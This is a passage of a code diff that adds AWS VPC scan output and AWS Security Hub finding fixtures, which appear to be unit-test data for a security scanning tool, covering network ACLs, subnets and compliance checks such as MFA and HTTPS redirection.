"aclassoc-ac34c3fe","NetworkAclId": "acl-f1a6ae8c","SubnetId": "subnet-8c27ffbd"},{"NetworkAclAssociationId": "aclassoc-5233c400","NetworkAclId": "acl-f1a6ae8c","SubnetId": "subnet-6e61f24f"},{"NetworkAclAssociationId": "aclassoc-ae34c3fc","NetworkAclId": "acl-f1a6ae8c","SubnetId": "subnet-cbefcb86"},{"NetworkAclAssociationId": "aclassoc-a934c3fb","NetworkAclId": "acl-f1a6ae8c","SubnetId": "subnet-77e07411"}],"IsDefault": true,"OwnerId": "430150006394","Tags": [],"VpcId": "vpc-ba1cbdc7","allow_all_egress_traffic": "100","allow_all_ingress_traffic": "100","id": "acl-f1a6ae8c","name": "acl-f1a6ae8c","rules": {"egress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}},"ingress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}}},"use_default_egress_rules": true,"use_default_ingress_rules": true}},"route_tables": {"rtb-5988a427": {"Associations": [{"AssociationState": {"State": "associated"},"Main": true,"RouteTableAssociationId": "rtbassoc-6d069a1c","RouteTableId": "rtb-5988a427"}],"PropagatingVgws": [],"Routes": [{"DestinationCidrBlock": "172.31.0.0/16","GatewayId": "local","Origin": "CreateRouteTable","State": "active"},{"DestinationCidrBlock": "0.0.0.0/0","GatewayId": "igw-65b4a01e","Origin": "CreateRoute","State": "active"}],"name": "vpc-ba1cbdc7"}},"subnets": {"subnet-30be2f6f": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "us-east-1c","AvailabilityZoneId": "use1-az6","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.32.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:us-east-1:430150006394:subnet/subnet-30be2f6f","SubnetId": "subnet-30be2f6f","VpcId": "vpc-ba1cbdc7","flow_logs": [],"name": "subnet-30be2f6f","network_acl": "acl-f1a6ae8c"},"subnet-6e61f24f": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "us-east-1a","AvailabilityZoneId": "use1-az2","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.80.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:us-east-1:430150006394:subnet/subnet-6e61f24f","SubnetId": "subnet-6e61f24f","VpcId": "vpc-ba1cbdc7","flow_logs": [],"name": "subnet-6e61f24f","network_acl": "acl-f1a6ae8c"},"subnet-7056187e": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "us-east-1f","AvailabilityZoneId": "use1-az5","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.64.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:us-east-1:430150006394:subnet/subnet-7056187e","SubnetId": "subnet-7056187e","VpcId": "vpc-ba1cbdc7","flow_logs": [],"name": "subnet-7056187e","network_acl": "acl-f1a6ae8c"},"subnet-77e07411": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "us-east-1d","AvailabilityZoneId": "use1-az1","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.0.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:us-east-1:430150006394:subnet/subnet-77e07411","SubnetId": "subnet-77e07411","VpcId": "vpc-ba1cbdc7","flow_logs": [],"name": "subnet-77e07411","network_acl": "acl-f1a6ae8c"},"subnet-8c27ffbd": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "us-east-1e","AvailabilityZoneId": "use1-az3","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.48.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:us-east-1:430150006394:subnet/subnet-8c27ffbd","SubnetId": "subnet-8c27ffbd","VpcId": "vpc-ba1cbdc7","flow_logs": [],"name": "subnet-8c27ffbd","network_acl": "acl-f1a6ae8c"},"subnet-cbefcb86": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "us-east-1b","AvailabilityZoneId": "use1-az4","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.16.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:us-east-1:430150006394:subnet/subnet-cbefcb86","SubnetId": "subnet-cbefcb86","VpcId": "vpc-ba1cbdc7","flow_logs": [],"name": "subnet-cbefcb86","network_acl": "acl-f1a6ae8c"}}}},"vpcs_count": 1,"vpn_connections": {},"vpn_connections_count": 0,"vpn_gateways": {},"vpn_gateways_count": 0},"us-east-2": {"customer_gateways": {},"customer_gateways_count": 0,"flow_logs": {},"flow_logs_count": 0,"network_acls_count": 1,"peering_connections": {},"peering_connections_count": 0,"region": "us-east-2","route_tables_count": 1,"subnets_count": 3,"vpc_resource_types": ["network_acls","subnets","route_tables"],"vpcs": {"vpc-e429ad8f": {"name": "vpc-e429ad8f","network_acls": {"acl-b06507db": {"Associations": [{"NetworkAclAssociationId": "aclassoc-164f9a74","NetworkAclId": "acl-b06507db","SubnetId": "subnet-81a1eccd"},{"NetworkAclAssociationId": "aclassoc-114f9a73","NetworkAclId": "acl-b06507db","SubnetId": "subnet-18e60365"},{"NetworkAclAssociationId": "aclassoc-104f9a72","NetworkAclId": "acl-b06507db","SubnetId": "subnet-fac76891"}],"IsDefault": true,"OwnerId": "430150006394","Tags": [],"VpcId": "vpc-e429ad8f","allow_all_egress_traffic": "100","allow_all_ingress_traffic": "100","id": "acl-b06507db","name": "acl-b06507db","rules": {"egress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}},"ingress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}}},"use_default_egress_rules": true,"use_default_ingress_rules": true}},"route_tables": {"rtb-20703c4b": {"Associations": [{"AssociationState": {"State": "associated"},"Main": true,"RouteTableAssociationId": "rtbassoc-d94acab3","RouteTableId": "rtb-20703c4b"}],"PropagatingVgws": [],"Routes": [{"DestinationCidrBlock": "172.31.0.0/16","GatewayId": "local","Origin": "CreateRouteTable","State": "active"},{"DestinationCidrBlock": "0.0.0.0/0","GatewayId": "igw-402d0c28","Origin": "CreateRoute","State": "active"}],"name": "vpc-e429ad8f"}},"subnets": {"subnet-18e60365": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "us-east-2b","AvailabilityZoneId": "use2-az2","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.16.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:us-east-2:430150006394:subnet/subnet-18e60365","SubnetId": "subnet-18e60365","VpcId": "vpc-e429ad8f","flow_logs": [],"name": "subnet-18e60365","network_acl": "acl-b06507db"},"subnet-81a1eccd": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "us-east-2c","AvailabilityZoneId": "use2-az3","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.32.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:us-east-2:430150006394:subnet/subnet-81a1eccd","SubnetId": "subnet-81a1eccd","VpcId": "vpc-e429ad8f","flow_logs": [],"name": "subnet-81a1eccd","network_acl": "acl-b06507db"},"subnet-fac76891": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "us-east-2a","AvailabilityZoneId": "use2-az1","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.0.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:us-east-2:430150006394:subnet/subnet-fac76891","SubnetId": "subnet-fac76891","VpcId": "vpc-e429ad8f","flow_logs": [],"name": "subnet-fac76891","network_acl": "acl-b06507db"}}}},"vpcs_count": 1,"vpn_connections": {},"vpn_connections_count": 0,"vpn_gateways": {},"vpn_gateways_count": 0},"us-west-1": {"customer_gateways": {},"customer_gateways_count": 0,"flow_logs": {},"flow_logs_count": 0,"network_acls_count": 1,"peering_connections": {},"peering_connections_count": 0,"region": "us-west-1","route_tables_count": 1,"subnets_count": 2,"vpc_resource_types": ["network_acls","subnets","route_tables"],"vpcs": {"vpc-6e6fa508": {"name": "vpc-6e6fa508","network_acls": {"acl-14a0c772": {"Associations": [{"NetworkAclAssociationId": "aclassoc-a9f7b7d5","NetworkAclId": "acl-14a0c772","SubnetId": "subnet-64f07402"},{"NetworkAclAssociationId": "aclassoc-a8f7b7d4","NetworkAclId": "acl-14a0c772","SubnetId": "subnet-3162b36b"}],"IsDefault": true,"OwnerId": "430150006394","Tags": [],"VpcId": "vpc-6e6fa508","allow_all_egress_traffic": "100","allow_all_ingress_traffic": "100","id": "acl-14a0c772","name": "acl-14a0c772","rules": {"egress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}},"ingress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}}},"use_default_egress_rules": true,"use_default_ingress_rules": true}},"route_tables": {"rtb-e3adec85": {"Associations": [{"AssociationState": {"State": "associated"},"Main": true,"RouteTableAssociationId": "rtbassoc-8c22b9f5","RouteTableId": "rtb-e3adec85"}],"PropagatingVgws": [],"Routes": [{"DestinationCidrBlock": "172.31.0.0/16","GatewayId": "local","Origin": "CreateRouteTable","State": "active"},{"DestinationCidrBlock": "0.0.0.0/0","GatewayId": "igw-05fa3162","Origin": "CreateRoute","State": "active"}],"name": "vpc-6e6fa508"}},"subnets": {"subnet-3162b36b": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "us-west-1c","AvailabilityZoneId": "usw1-az3","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.0.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:us-west-1:430150006394:subnet/subnet-3162b36b","SubnetId": "subnet-3162b36b","VpcId": "vpc-6e6fa508","flow_logs": [],"name": "subnet-3162b36b","network_acl": "acl-14a0c772"},"subnet-64f07402": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "us-west-1a","AvailabilityZoneId": "usw1-az1","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.16.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:us-west-1:430150006394:subnet/subnet-64f07402","SubnetId": "subnet-64f07402","VpcId": "vpc-6e6fa508","flow_logs": [],"name": "subnet-64f07402","network_acl": "acl-14a0c772"}}}},"vpcs_count": 1,"vpn_connections": {},"vpn_connections_count": 0,"vpn_gateways": {},"vpn_gateways_count": 0},"us-west-2": {"customer_gateways": {},"customer_gateways_count": 0,"flow_logs": {},"flow_logs_count": 0,"network_acls_count": 1,"peering_connections": {},"peering_connections_count": 0,"region": "us-west-2","route_tables_count": 1,"subnets_count": 4,"vpc_resource_types": ["network_acls","subnets","route_tables"],"vpcs": {"vpc-d45709ac": {"name": "vpc-d45709ac","network_acls": {"acl-f76adc8c": {"Associations": [{"NetworkAclAssociationId": "aclassoc-5edb3d1c","NetworkAclId": "acl-f76adc8c","SubnetId": "subnet-1075cf4d"},{"NetworkAclAssociationId": "aclassoc-5ddb3d1f","NetworkAclId": "acl-f76adc8c","SubnetId": "subnet-64dae84f"},{"NetworkAclAssociationId": "aclassoc-5fdb3d1d","NetworkAclId": "acl-f76adc8c","SubnetId": "subnet-25f65d5d"},{"NetworkAclAssociationId": "aclassoc-5cdb3d1e","NetworkAclId": "acl-f76adc8c","SubnetId": "subnet-113ce95b"}],"IsDefault": true,"OwnerId": "430150006394","Tags": [],"VpcId": "vpc-d45709ac","allow_all_egress_traffic": "100","allow_all_ingress_traffic": "100","id": "acl-f76adc8c","name": "acl-f76adc8c","rules": {"egress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}},"ingress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}}},"use_default_egress_rules": true,"use_default_ingress_rules": true}},"route_tables": {"rtb-2a87bf51": {"Associations": [{"AssociationState": {"State": "associated"},"Main": true,"RouteTableAssociationId": "rtbassoc-28eff655","RouteTableId": "rtb-2a87bf51"}],"PropagatingVgws": [],"Routes": [{"DestinationCidrBlock": "172.31.0.0/16","GatewayId": "local","Origin": "CreateRouteTable","State": "active"},{"DestinationCidrBlock": "0.0.0.0/0","GatewayId": "igw-a31e9eda","Origin": "CreateRoute","State": "active"}],"name": "vpc-d45709ac"}},"subnets": {"subnet-1075cf4d": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "us-west-2c","AvailabilityZoneId": "usw2-az3","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.0.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:us-west-2:430150006394:subnet/subnet-1075cf4d","SubnetId": "subnet-1075cf4d","VpcId": "vpc-d45709ac","flow_logs": [],"name": "subnet-1075cf4d","network_acl": "acl-f76adc8c"},"subnet-113ce95b": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "us-west-2b","AvailabilityZoneId": "usw2-az2","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.32.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:us-west-2:430150006394:subnet/subnet-113ce95b","SubnetId": "subnet-113ce95b","VpcId": "vpc-d45709ac","flow_logs": [],"name": "subnet-113ce95b","network_acl": "acl-f76adc8c"},"subnet-25f65d5d": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "us-west-2a","AvailabilityZoneId": "usw2-az1","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.16.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:us-west-2:430150006394:subnet/subnet-25f65d5d","SubnetId": "subnet-25f65d5d","VpcId": "vpc-d45709ac","flow_logs": [],"name": "subnet-25f65d5d","network_acl": "acl-f76adc8c"},"subnet-64dae84f": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "us-west-2d","AvailabilityZoneId": "usw2-az4","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.48.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:us-west-2:430150006394:subnet/subnet-64dae84f","SubnetId": "subnet-64dae84f","VpcId": "vpc-d45709ac","flow_logs": [],"name": "subnet-64dae84f","network_acl": "acl-f76adc8c"}}}},"vpcs_count": 1,"vpn_connections": {},"vpn_connections_count": 0,"vpn_gateways": {},"vpn_gateways_count": 0}},"regions_count": 21,"resource_types": {"global": [],"region": ["vpcs","flow_logs","customer_gateways","vpn_gateways","vpn_connections","peering_connections"],"vpc": ["network_acls","subnets","route_tables"]},"route_tables_count": 17,"service": "vpc","subnets_count": 55,"targets": {"first_region": [["network_acls","NetworkAcls","describe_network_acls",{},false],["vpcs","Vpcs","describe_vpcs",{},false],["flow_logs","FlowLogs","describe_flow_logs",{},false],["subnets","Subnets","describe_subnets",{},false],["customer_gateways","CustomerGateways","describe_customer_gateways",{},false],["vpn_gateways","VpnGateways","describe_vpn_gateways",{},false],["vpn_connections","VpnConnections","describe_vpn_connections",{},false],["route_tables","RouteTables","describe_route_tables",{},false],["peering_connections","VpcPeeringConnections","describe_vpc_peering_connections",{},false]],"other_regions": [["network_acls","NetworkAcls","describe_network_acls",{},false],["vpcs","Vpcs","describe_vpcs",{},false],["flow_logs","FlowLogs","describe_flow_logs",{},false],["subnets","Subnets","describe_subnets",{},false],["customer_gateways","CustomerGateways","describe_customer_gateways",{},false],["vpn_gateways","VpnGateways","describe_vpn_gateways",{},false],["vpn_connections","VpnConnections","describe_vpn_connections",{},false],["route_tables","RouteTables","describe_route_tables",{},false],["peering_connections","VpcPeeringConnections","describe_vpc_peering_connections",{},false]]},"thread_config": {"list": 10,"parse": 20},"vpcs_count": 17,"vpn_connections_count": 0,"vpn_gateways_count": 0}}} diff --git a/unittests/scans/awssecurityhub/many_findings.json b/unittests/scans/awssecurityhub/many_findings.json new file mode 100644 index 00000000000..ab2e45c2140 --- /dev/null +++ b/unittests/scans/awssecurityhub/many_findings.json @@ -0,0 +1,195 @@ +{ + "findings": [ + { + "SchemaVersion": "2018-10-08", + "Id": "arn:aws:securityhub:us-east-1:012345678912:subscription/aws-foundational-security-best-practices/v/1.0.0/IAM.5/finding/de861909-2d26-4e45-bd86-19d2ab6ceef1", + "ProductArn": "arn:aws:securityhub:us-east-1::product/aws/securityhub", + "GeneratorId": "aws-foundational-security-best-practices/v/1.0.0/IAM.5", + "AwsAccountId": "012345678912", + "Types": [ + "Software and Configuration Checks/Industry and Regulatory Standards/AWS-Foundational-Security-Best-Practices" + ], + "FirstObservedAt": "2020-06-08T14:33:07.560Z", + "LastObservedAt": "2020-06-14T21:02:53.940Z", + "CreatedAt": "2020-06-08T14:33:07.560Z", + "UpdatedAt": "2020-06-14T21:02:53.454Z", + "Severity": { + "Product": 0, + "Label": "INFORMATIONAL", + "Normalized": 0, + "Original": "INFORMATIONAL" + }, + "Title": "IAM.5 MFA should be enabled for all IAM users that have console password", + "Description": "This AWS control checks whether AWS Multi-Factor Authentication (MFA) is enabled for all AWS Identity and Access Management (IAM) users that use a console password.", + "Remediation": { + "Recommendation": { + "Text": "For directions on how to fix this issue, please consult the AWS Security Hub Foundational Security Best Practices documentation.", + "Url": "https://docs.aws.amazon.com/console/securityhub/IAM.5/remediation" + } + }, + "ProductFields": { + "StandardsArn": "arn:aws:securityhub:::standards/aws-foundational-security-best-practices/v/1.0.0", + "StandardsSubscriptionArn": "arn:aws:securityhub:us-east-1:012345678912:subscription/aws-foundational-security-best-practices/v/1.0.0", + "ControlId": "IAM.5", + "RecommendationUrl": "https://docs.aws.amazon.com/console/securityhub/IAM.5/remediation", + "RelatedAWSResources:0/name": "securityhub-mfa-enabled-for-iam-console-access-9ae73a2f", + "RelatedAWSResources:0/type": "AWS::Config::ConfigRule", + "StandardsControlArn": "arn:aws:securityhub:us-east-1:012345678912:control/aws-foundational-security-best-practices/v/1.0.0/IAM.5", + "aws/securityhub/SeverityLabel": "INFORMATIONAL", + "aws/securityhub/ProductName": "Security Hub", + "aws/securityhub/CompanyName": "AWS", + "aws/securityhub/annotation": "AWS Config evaluated your resources against the rule. The rule did not apply to the AWS resources in its scope, the specified resources were deleted, or the evaluation results were deleted.", + "aws/securityhub/FindingId": "arn:aws:securityhub:us-east-1::product/aws/securityhub/arn:aws:securityhub:us-east-1:012345678912:subscription/aws-foundational-security-best-practices/v/1.0.0/IAM.5/finding/de861909-2d26-4e45-bd86-19d2ab6ceef1" + }, + "Resources": [ + { + "Type": "AwsAccount", + "Id": "AWS::::Account:012345678912", + "Partition": "aws", + "Region": "us-east-1" + } + ], + "Compliance": { + "Status": "PASSED", + "StatusReasons": [ + { + "ReasonCode": "CONFIG_EVALUATIONS_EMPTY", + "Description": "AWS Config evaluated your resources against the rule. The rule did not apply to the AWS resources in its scope, the specified resources were deleted, or the evaluation results were deleted." + } + ] + }, + "WorkflowState": "NEW", + "Workflow": { + "Status": "NEW" + }, + "RecordState": "ACTIVE" + }, + { + "SchemaVersion": "2018-10-08", + "Id": "arn:aws:securityhub:us-east-1:012345678912:subscription/aws-foundational-security-best-practices/v/1.0.0/SSM.2/finding/c3c9b6b4-4f33-4d9c-b81a-646e6c187a99", + "ProductArn": "arn:aws:securityhub:us-east-1::product/aws/securityhub", + "GeneratorId": "aws-foundational-security-best-practices/v/1.0.0/SSM.2", + "AwsAccountId": "012345678912", + "Types": [ + "Software and Configuration Checks/Industry and Regulatory Standards/AWS-Foundational-Security-Best-Practices" + ], + "FirstObservedAt": "2020-06-08T14:32:42.981Z", + "LastObservedAt": "2020-06-14T21:02:45.329Z", + "CreatedAt": "2020-06-08T14:32:42.981Z", + "UpdatedAt": "2020-06-14T21:02:44.496Z", + "Severity": { + "Product": 0, + "Label": "INFORMATIONAL", + "Normalized": 0, + "Original": "INFORMATIONAL" + }, + "Title": "SSM.2 EC2 instances managed by Systems Manager should have a patch compliance status of COMPLIANT after a patch installation", + "Description": "This AWS control checks whether the compliance status of the Amazon EC2 Systems Manager patch compliance is COMPLIANT or NON_COMPLIANT after the patch installation on the instance. It only checks instances that are managed by AWS Systems Manager Patch Manager.", + "Remediation": { + "Recommendation": { + "Text": "For directions on how to fix this issue, please consult the AWS Security Hub Foundational Security Best Practices documentation.", + "Url": "https://docs.aws.amazon.com/console/securityhub/SSM.2/remediation" + } + }, + "ProductFields": { + "StandardsArn": "arn:aws:securityhub:::standards/aws-foundational-security-best-practices/v/1.0.0", + "StandardsSubscriptionArn": "arn:aws:securityhub:us-east-1:012345678912:subscription/aws-foundational-security-best-practices/v/1.0.0", + "ControlId": "SSM.2", + "RecommendationUrl": "https://docs.aws.amazon.com/console/securityhub/SSM.2/remediation", + "RelatedAWSResources:0/name": "securityhub-ec2-managedinstance-patch-compliance-bea86e27", + "RelatedAWSResources:0/type": "AWS::Config::ConfigRule", + "StandardsControlArn": "arn:aws:securityhub:us-east-1:012345678912:control/aws-foundational-security-best-practices/v/1.0.0/SSM.2", + "aws/securityhub/SeverityLabel": "INFORMATIONAL", + "aws/securityhub/ProductName": "Security Hub", + "aws/securityhub/CompanyName": "AWS", + "aws/securityhub/annotation": "AWS Config evaluated your resources against the rule. The rule did not apply to the AWS resources in its scope, the specified resources were deleted, or the evaluation results were deleted.", + "aws/securityhub/FindingId": "arn:aws:securityhub:us-east-1::product/aws/securityhub/arn:aws:securityhub:us-east-1:012345678912:subscription/aws-foundational-security-best-practices/v/1.0.0/SSM.2/finding/c3c9b6b4-4f33-4d9c-b81a-646e6c187a99" + }, + "Resources": [ + { + "Type": "AwsAccount", + "Id": "AWS::::Account:012345678912", + "Partition": "aws", + "Region": "us-east-1" + } + ], + "Compliance": { + "Status": "PASSED", + "StatusReasons": [ + { + "ReasonCode": "CONFIG_EVALUATIONS_EMPTY", + "Description": "AWS Config evaluated your resources against the rule. The rule did not apply to the AWS resources in its scope, the specified resources were deleted, or the evaluation results were deleted." + } + ] + }, + "WorkflowState": "NEW", + "Workflow": { + "Status": "NEW" + }, + "RecordState": "ACTIVE" + }, + { + "SchemaVersion": "2018-10-08", + "Id": "arn:aws:securityhub:us-east-1:012345678912:subscription/aws-foundational-security-best-practices/v/1.0.0/ELBv2.1/finding/27aa50f4-d793-4e54-8649-4522e876230f", + "ProductArn": "arn:aws:securityhub:us-east-1::product/aws/securityhub", + "GeneratorId": "aws-foundational-security-best-practices/v/1.0.0/ELBv2.1", + "AwsAccountId": "012345678912", + "Types": [ + "Software and Configuration Checks/Industry and Regulatory Standards/AWS-Foundational-Security-Best-Practices" + ], + "FirstObservedAt": "2020-06-08T14:33:35.245Z", + "CreatedAt": "2020-06-08T14:33:35.245Z", + "UpdatedAt": "2020-06-14T21:02:32.493Z", + "Severity": { + "Product": 0, + "Label": "INFORMATIONAL", + "Normalized": 0, + "Original": "INFORMATIONAL" + }, + "Title": "ELBv2.1 Application Load Balancer should be configured to redirect all HTTP requests to HTTPS", + "Description": "This AWS control checks whether HTTP to HTTPS redirection is configured on all HTTP listeners of Application Load Balancers. The control will fail if one or more HTTP listeners of Application Load Balancers do not have HTTP to HTTPS redirection configured.", + "Remediation": { + "Recommendation": { + "Text": "For directions on how to fix this issue, please consult the AWS Security Hub Foundational Security Best Practices documentation.", + "Url": "https://docs.aws.amazon.com/console/securityhub/ELBv2.1/remediation" + } + }, + "ProductFields": { + "StandardsArn": "arn:aws:securityhub:::standards/aws-foundational-security-best-practices/v/1.0.0", + "StandardsSubscriptionArn": "arn:aws:securityhub:us-east-1:012345678912:subscription/aws-foundational-security-best-practices/v/1.0.0", + "ControlId": "ELBv2.1", + "RecommendationUrl": "https://docs.aws.amazon.com/console/securityhub/ELBv2.1/remediation", + "RelatedAWSResources:0/name": "securityhub-alb-http-to-https-redirection-check-c641319b", + "RelatedAWSResources:0/type": "AWS::Config::ConfigRule", + "StandardsControlArn": "arn:aws:securityhub:us-east-1:012345678912:control/aws-foundational-security-best-practices/v/1.0.0/ELBv2.1", + "aws/securityhub/SeverityLabel": "INFORMATIONAL", + "aws/securityhub/ProductName": "Security Hub", + "aws/securityhub/CompanyName": "AWS", + "aws/securityhub/annotation": "AWS Config evaluated your resources against the rule. The rule did not apply to the AWS resources in its scope, the specified resources were deleted, or the evaluation results were deleted.", + "aws/securityhub/FindingId": "arn:aws:securityhub:us-east-1::product/aws/securityhub/arn:aws:securityhub:us-east-1:012345678912:subscription/aws-foundational-security-best-practices/v/1.0.0/ELBv2.1/finding/27aa50f4-d793-4e54-8649-4522e876230f" + }, + "Resources": [ + { + "Type": "AwsAccount", + "Id": "AWS::::Account:012345678912", + "Partition": "aws", + "Region": "us-east-1" + } + ], + "Compliance": { + "Status": "PASSED", + "StatusReasons": [ + { + "ReasonCode": "CONFIG_EVALUATIONS_EMPTY", + "Description": "AWS Config evaluated your resources against the rule. The rule did not apply to the AWS resources in its scope, the specified resources were deleted, or the evaluation results were deleted." + } + ] + }, + "WorkflowState": "NEW", + "Workflow": { + "Status": "NEW" + }, + "RecordState": "ACTIVE" + } + ] +} \ No newline at end of file diff --git a/unittests/scans/awssecurityhub/one_finding.json b/unittests/scans/awssecurityhub/one_finding.json new file mode 100644 index 00000000000..d9d9a68c37f --- /dev/null +++ b/unittests/scans/awssecurityhub/one_finding.json @@ -0,0 +1,68 @@ +{ + "findings": [ + { + "SchemaVersion": "2018-10-08", + "Id": "arn:aws:securityhub:us-east-1:012345678912:subscription/aws-foundational-security-best-practices/v/1.0.0/IAM.5/finding/de861909-2d26-4e45-bd86-19d2ab6ceef1", + "ProductArn": "arn:aws:securityhub:us-east-1::product/aws/securityhub", + "GeneratorId": "aws-foundational-security-best-practices/v/1.0.0/IAM.5", + "AwsAccountId": "012345678912", + "Types": [ + "Software and Configuration Checks/Industry and Regulatory Standards/AWS-Foundational-Security-Best-Practices" + ], + "FirstObservedAt": "2020-06-08T14:33:07.560Z", + "LastObservedAt": "2020-06-14T21:02:53.940Z", + "CreatedAt": "2020-06-08T14:33:07.560Z", + "UpdatedAt": "2020-06-14T21:02:53.454Z", + "Severity": { + "Product": 0, + "Label": "INFORMATIONAL", + "Normalized": 0, + "Original": "INFORMATIONAL" + }, + "Title": "IAM.5 MFA should be enabled for all IAM users that have console password", + "Description": "This AWS control checks whether AWS Multi-Factor Authentication (MFA) is enabled for all AWS Identity and Access Management (IAM) users that use a console password.", + "Remediation": { + "Recommendation": { + "Text": "For directions on how to fix this issue, please consult the AWS Security Hub Foundational Security Best Practices documentation.", + "Url": "https://docs.aws.amazon.com/console/securityhub/IAM.5/remediation" + } + }, + "ProductFields": { + "StandardsArn": "arn:aws:securityhub:::standards/aws-foundational-security-best-practices/v/1.0.0", + "StandardsSubscriptionArn": "arn:aws:securityhub:us-east-1:012345678912:subscription/aws-foundational-security-best-practices/v/1.0.0", + "ControlId": 